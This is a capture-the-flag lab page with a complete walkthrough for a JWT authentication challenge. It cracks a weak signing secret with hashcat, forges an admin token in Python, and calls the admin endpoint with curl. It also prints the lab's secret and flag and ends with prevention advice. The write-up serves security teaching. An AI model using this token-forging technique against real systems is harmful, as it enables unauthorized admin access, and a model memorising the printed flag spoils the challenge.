Avatar

Labs / JWT Bypass

  • Challenge
  • Released 25 Jul 2025

JWT Bypass

Start the machine, hack the system, and find the hidden flags to complete this challenge and earn points!

1
Flags
1
Points
Challenge
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Challenge

JWT Bypass - Complete Solution Walkthrough

Step 1: Understanding the Challenge

The challenge presents a JWT-based authentication system. You need to analyze the JWT tokens and find a way to forge an admin token to access the admin panel.

Step 2: Initial Reconnaissance

  1. Access the JWT authentication system (you'll be automatically redirected from port 80 to the application)
  2. Login with the provided demo credentials:
    • Username: user
    • Password: password123
  3. This will give you a valid JWT token to analyze

Step 3: JWT Token Analysis

  1. Once you receive the JWT token, analyze it using tools like:
    • jwt.io - For decoding and analyzing JWT structure
    • hashcat - For cracking weak JWT secrets
    • john the ripper - Alternative for JWT secret cracking
  2. Examine the JWT structure: header.payload.signature

Step 4: Identifying the Vulnerability

  1. The JWT token uses a weak secret that can be cracked
  2. Use hashcat to crack the secret:
hashcat -a 0 -m 16500 <jwt_token> wordlist.txt
  1. Or try a dictionary attack with common secrets
  2. The secret is: secret123

Step 5: Forging an Admin Token

  1. Once you have the secret, forge a new JWT token with admin privileges
  2. Using Python to create the admin token:
#!/usr/bin/env python3
import jwt
import datetime

# If you get AttributeError, try: pip install PyJWT
payload = {
    'username': 'admin',
    'role': 'admin',
    'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=24)
}

secret = 'secret123'
admin_token = jwt.encode(payload, secret, algorithm='HS256')
print(admin_token)
  1. If you get an AttributeError, ensure you have the correct library:
pip install PyJWT
  1. Alternative approach using command line with a working Python environment:
python3 -c "import jwt, datetime; print(jwt.encode({'username': 'admin', 'role': 'admin', 'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=24)}, 'secret123', algorithm='HS256'))"
  1. Alternatively, use jwt.io with the secret to forge the token

Step 6: Accessing the Admin Panel

  1. Use the forged admin token to access the admin endpoint:
curl -H "Authorization: Bearer <admin_token>" <target-ip>:8080/admin
  1. The admin endpoint will return the flag in JSON format

Step 7: Retrieving the Flag

  1. The admin endpoint response contains the flag:
538955b8-96c1-4905-a305-8cc385de622c

Security Implications and Prevention

  • Weak Secrets: Never use predictable or dictionary-based secrets for JWT signing
  • Secret Management: Implement proper secret rotation and secure storage
  • Algorithm Verification: Always verify the algorithm used in JWT tokens
  • Server-side Validation: Implement robust JWT validation on the server side
  • Consider RS256: Use asymmetric algorithms for better security in production